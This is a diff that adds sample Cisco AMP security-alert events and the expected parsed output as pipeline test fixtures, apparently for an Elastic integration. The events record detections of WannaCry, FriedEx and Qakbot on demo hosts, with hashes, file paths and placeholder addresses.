+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":941000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179209167470598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":941000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":894000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179204872503300","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3020,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583840597369422000,"timestamp":1610621973,"timestamp_nanoseconds":231000000,"date":"2021-01-14T10:59:33+00:00","event_type":"Malicious Activity Detection","event_type_id":1090519105,"detection":"W32.MAP.Ransomware.rewrite","detection_id":"6583840593074454529","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mscorsvw.exe","file_path":"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe","identity":{"sha256":"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0","sha1":"c78f4c22dd195a1791472a2c271a0c85b53900d9","md5":"75a758a0c5cea48c9922d64a113d0f9d"},"parent":{"process_id":480,"disposition":"Clean","file_name":"services.exe","identity":{"sha256":"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536","sha1":"ff658a36899e43fec3966d608b4aa4472de7a378","md5":"71c85477df9347fe8e7bc55768473fca"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6701398782847286000,"timestamp":1610621970,"timestamp_nanoseconds":182000000,"date":"2021-01-14T10:59:30+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621970,"start_date":"2021-01-14T10:59:30+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.","short_description":"W32.PossibleRansomwareShadowCopyDeletion.ioc"},"file":{"disposition":"Clean","file_name":"vssadmin.exe","file_path":"file:///C%3A/Windows/SysWOW64/vssadmin.exe","identity":{"sha256":"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"},"parent":{"disposition":"Malicious","identity":{"sha256":"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":7007136036637603000,"timestamp":1610621707,"timestamp_nanoseconds":260000000,"date":"2021-01-14T10:55:07+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621707,"start_date":"2021-01-14T10:55:07+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.","short_description":"W32.PowershellEncodedBuffer.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"file:///C%3A/Windows/system32/cmd.exe","identity":{"sha256":"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"},"parent":{"disposition":"Clean","identity":{"sha256":"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1476905066250000100,"timestamp":1610621237,"timestamp_nanoseconds":250000000,"date":"2021-01-14T10:47:17+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610621237,"start_date":"2021-01-14T10:47:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Kovter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b6:9c:d0:89:b8:66"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"},"parent":{"disposition":"Clean","identity":{"sha256":"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1476905066228000300,"timestamp":1610621237,"timestamp_nanoseconds":228000000,"date":"2021-01-14T10:47:17+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621237,"start_date":"2021-01-14T10:47:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Kovter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b6:9c:d0:89:b8:66"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"},"parent":{"disposition":"Clean","identity":{"sha256":"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":758000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":758000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411425813945647105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":742000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}}
\ No newline at end of file
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp7.ndjson.log-expected.json b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp7.ndjson.log-expected.json
new file mode 100644
index 00000000000..83afe6a0131
--- /dev/null
+++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp7.ndjson.log-expected.json
@@ -0,0 +1,3968 @@
+{
+    "expected": [
+        {
+            "@timestamp": "2021-01-14T13:06:17.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:23.853984379Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204897366867970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419204901661835000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Delete pending",
+                        "error_code": 3221225558
+                    },
+                    "detection_id": "6419204897366867970",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T13:06:17.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:23.853988673Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":459000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204901661835279\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419204901661835000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Ransom:Gen.20gl.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419204901661835279",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T13:06:17.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:23.853990700Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":443000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204901661835278\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419204901661835000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419204901661835278",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T13:06:17.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "md5": "84c82835a5d21bbcf75a61706d8ab549"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "84c82835a5d21bbcf75a61706d8ab549",
+                    "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:23.853992661Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204901661835276\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
+                "kind": "alert",
